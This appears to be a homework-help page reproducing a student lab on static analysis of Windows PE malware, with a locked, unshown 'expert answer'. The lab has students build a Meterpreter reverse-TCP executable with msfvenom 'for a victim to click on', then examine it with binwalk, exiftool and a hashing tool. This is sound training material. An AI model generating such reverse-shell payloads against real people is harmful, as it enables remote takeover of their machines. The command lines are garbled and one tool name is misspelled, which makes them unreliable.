Question: Assignment 2 - 1 : Analyze and Classify Malware Objective: Conduct basic static analysis on a Windows PE malware sample. Scenario: Several employees have been
Assignment : Analyze and Classify Malware
Objective: Conduct basic static analysis on a Windows PE malware sample.
Scenario: Several employees have been targeted in phishing attempts, receiving emails with malware attachments. The task is to analyze malware samples extracted from these emails.
Tools: Kali, BinWalk, Exiftool, MDdeep
Exercise : CreateAnalyze Malicious Executable
Lab Description: In this lab, the student will learn to create a malicious executable and then learn how to analyze the file.
Lab Objective: To employ analysis tools against a malware sample.
Lab Scenario: After receiving a copy of suspected malware, you're asked to analyze it and gain additional information to give to the investigatory team.
Log on to the Kali LAN
Log on to the Kali LAN in as root with the password of kali.
Kali LAN Terminal
Open a terminal by clicking on the terminal icon at the top of the screen.
Kali LAN msfvenom Create Executable
Let's create a malicious binary that we can host on our web server for a victim to click on:
msfvenom a xplatform windows p windowsmeterpreterreversetcp LHOST LPORTf exe o maliciousfile.exe
Type ls and verify the file was created.
Congratulations.
Exercise : Analyze Malware
Use various tools in Kali to analyze the malware sample.
Binwalk Analysis
Type the following into a terminal:
binwalk B maliciousfile.exe
After viewing it close the window not the terminal
Binwalk opcode Analysis
Let's search for some commonly used opcodes. These can give us some information about what the malware may be trying to do
binwalk A maliciousfile.exe
Exiftool
In a terminal at the command prompt type the following:
exiftool maliciousfile.exe
Hash Malware
We'll run a tool called mddeep which is native to Kali.
Type: mddeep maliciousfile.exe
The hash will show up in the terminal. In your analysis report you would add this hash for future reference. concise report explaining the steps you took to in your Malware Analysis
Step by Step Solution
There are 3 Steps involved in it
1 Expert Approved Answer
Step: 1 Unlock
Question Has Been Solved by an Expert!
Get step-by-step solutions from verified subject matter experts
Step: 2 Unlock
Step: 3 Unlock
